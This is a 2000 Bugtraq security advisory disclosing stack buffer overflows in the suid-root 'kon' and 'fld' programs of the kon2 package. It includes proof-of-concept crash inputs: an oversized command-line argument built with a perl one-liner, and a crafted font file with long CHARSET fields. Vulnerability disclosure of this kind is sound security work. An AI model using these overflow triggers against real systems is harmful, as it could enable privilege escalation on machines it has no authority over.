Return-Path: owner-bugtraq@SECURITYFOCUS.COM MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Mon, 19 Jun 2000 23:51:53 +0100 Reply-To: Chris Evans Sender: Bugtraq List From: Chris Evans Subject: Problems with "kon2" package To: BUGTRAQ@SECURITYFOCUS.COM Hi, I had reason to investigate the security of a package called "kon2" - a program for displaying Japanese on the console I'm led to believe. SUMMARY ======= kon2-0.3.9 In the version I briefly examined, there were three suid-root execuatbles - kon - fld - newvc Here are details of breakages in "kon" and "fld". I believe both lead to root compromise, although I haven't verified if something has dropped root privileges or not at the time of the overflows. DEMOS ===== No discussion of code flaws today, because boring stack overflows are being used 1) kon kon VGA -StartupMessage `perl -e 'print "A"x10000'` => segfault with EIP 0x41414141 2) fld a) Create file "read.me.and.die", contents: CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA" CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA" CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA" ... BUT substitute each sequence of A's for 200 A's b) fld -t bdf read.me.and.die I don't get a clean 0x41414141 stacktrace but that's just a minor detail, and these things are always circumventable (I think a pointer gets toasted inbetween two char[] buffers on the stack) Cheers Chris